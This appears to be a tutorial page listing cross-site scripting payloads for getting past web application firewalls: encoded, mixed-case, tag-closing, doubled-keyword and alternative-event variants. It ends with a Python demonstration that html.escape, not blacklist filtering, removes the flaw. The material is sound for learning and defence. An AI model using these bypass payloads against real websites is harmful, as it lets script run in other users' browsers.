Cross-site scripting (XSS): some techniques to bypass a WAF
Cross-site scripting (XSS) is a web application vulnerability that arises when user-controlled data is written into a page without proper output encoding, so that an attacker can supply data that the browser renders as part of the page. Because an XSS attack writes script or HTML into the page content, an XSS vulnerability is also called an HTML injection vulnerability.
How to bypass a WAF:
- Encoding bypass
  Hex encode: <0x736372697074>alert('123')</0x736372697074> (0x736372697074 is "script" in hex; a browser does not decode a hex tag name, so this only helps when the application itself decodes hex before rendering)
  JSFuck: rewrite the JavaScript using only the six characters []()!+ so that no keyword such as alert appears literally in the payload
  URL encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
  UTF-7 encode (listed as "Unicode" in the original): +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4- (+ADw- is <, +AD0- is =, +AD4- is >; it only fires if the page is interpreted as UTF-7, which current browsers no longer do)
- magic_quotes_gpc bypass: <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>
  The character codes spell alert("XSS"); without a single quote character, so escaped quotes do not matter. Note that String.fromCharCode only returns the string; pass it to eval() to actually execute it.
- Close the tag:
  "><script>alert(/123/)</script>
  </script><script>alert(1)</script>
- Case insensitive: <ScRIpT>alert('123')</sCRIpT> (HTML tag and attribute names are case-insensitive to the browser, so a case-sensitive filter misses this)
- Use other tags and attributes:
  <button onclick="javascript:alert('xss')">XSS</button>
  <title><img a="</title><img/src=1 onerror=alert(1)//">
  "onsubmit=javascript:alert(1)%20name="a
- Use comments and separators to break up the keywords a filter looks for:
  %0a (newline), e.g. %0aalert(1);
  /**/ (JavaScript comment)
  %00 (null byte)
- Double-keyword bypass (for filters that strip a keyword once instead of rejecting the request):
  <img ononerrorerror="123">
  <script>alalertert(123)</script>
  Removing one copy of onerror leaves onerror, and removing one copy of alert leaves alert.
- Other events and functions: if the filter only knows onerror and alert, use a handler or function that is not on its list
  onload
  onclick
  onerror
  prompt
  confirm
  onmousemove
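The list above shows what each trick looks like; the following example, added for this page and not taken from the original post, shows why they work against a blacklist filter and what actually closes the hole. It models a hypothetical homegrown WAF that strips three blacklisted tokens case-sensitively in a single pass, runs the case, full-URL-encoding, double-keyword, String.fromCharCode and alternative-event payloads through it (the page's payloads plus constructed combinations of them), then checks a normalising filter that rejects instead of strips, and finally the real fix, contextual output encoding with html.escape. BLACKLIST, the PAYLOADS set and the rough BROWSER_EXECUTES proxy are all constructed for the demonstration.

```python
import html
import re
import urllib.parse

# Constructed blacklist of a hypothetical homegrown WAF (not from the original post).
BLACKLIST = ("<script", "onerror", "alert")
DANGEROUS = re.compile("|".join(re.escape(b) for b in BLACKLIST), re.IGNORECASE)

# Rough proxy for "the browser would run this": a script tag, an on*= handler
# or a javascript: URL, matched case-insensitively as the HTML parser does.
BROWSER_EXECUTES = re.compile(r"<script|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def naive_waf(raw: str) -> str:
    """Case-sensitive, single-pass stripping filter: the kind the bypasses target."""
    for bad in BLACKLIST:
        raw = raw.replace(bad, "")
    return raw


def app_decodes(raw: str) -> str:
    """The application URL-decodes the parameter after the WAF has inspected it raw."""
    return urllib.parse.unquote(raw)


def full_url_encode(s: str) -> str:
    """Percent-encode every character so no keyword is visible to a literal match."""
    return "".join(f"%{ord(c):02X}" for c in s)


def from_char_code(js: str) -> str:
    """Express a string without quote characters (the magic_quotes_gpc trick)."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + ")"


# Page payloads plus constructed combinations of the listed tricks. For "case"
# the tag survives but alert() is stripped; "charcode" combines case and
# String.fromCharCode into a payload that runs unchanged.
PAYLOADS = {
    "plain": "<script>alert('123')</script>",
    "case": "<ScRIpT>alert('123')</sCRIpT>",
    "url": full_url_encode("<img src=x onerror=prompt(1)>"),
    "double": "<img src=x ononerrorerror=alalertert(1)>",
    "charcode": "<ScRIpT>eval(" + from_char_code("alert(1)") + ")</ScRIpT>",
    "event": "<img src=x onmousemove=prompt(1)>",
}


def normalize(raw: str) -> str:
    """Undo the listed transformations before matching: decode to a fixed point
    (beats double encoding), drop null bytes and comments, fold case."""
    prev, cur = None, raw
    while cur != prev:
        prev = cur
        cur = html.unescape(urllib.parse.unquote(cur))
    cur = cur.replace("\x00", "")
    cur = re.sub(r"/\*.*?\*/", "", cur, flags=re.DOTALL)
    return cur.lower()


def hardened_waf_blocks(raw: str) -> bool:
    """Reject rather than strip, so removing one copy of a keyword can never
    leave another behind. Still a blacklist: unknown handlers get through."""
    return DANGEROUS.search(normalize(raw)) is not None


def render_safe(value: str) -> str:
    """The actual fix: output encoding for the HTML text context. Without a
    literal '<' no tag, and therefore no handler, can be created."""
    return html.escape(value, quote=True)


def evaluate() -> dict:
    """Per payload: (survives naive WAF, rejected by hardened WAF, inert once escaped)."""
    results = {}
    for name, raw in PAYLOADS.items():
        survives = BROWSER_EXECUTES.search(app_decodes(naive_waf(raw))) is not None
        inert = "<" not in render_safe(app_decodes(raw))
        results[name] = (survives, hardened_waf_blocks(raw), inert)
    return results


if __name__ == "__main__":
    for name, (naive, hardened, escaped) in evaluate().items():
        print(f"{name:9s} bypasses naive WAF: {naive!s:5s} "
              f"blocked by normalised WAF: {hardened!s:5s} inert after escape: {escaped}")
```

Running it shows every listed trick except the plain payload getting past the stripping filter, the normalising filter catching all of them except the onmousemove handler it has never heard of, and html.escape neutralising all six regardless of encoding. That is the practical lesson of the list: a WAF blacklist buys time against scanners, but only output encoding in the correct context removes the vulnerability.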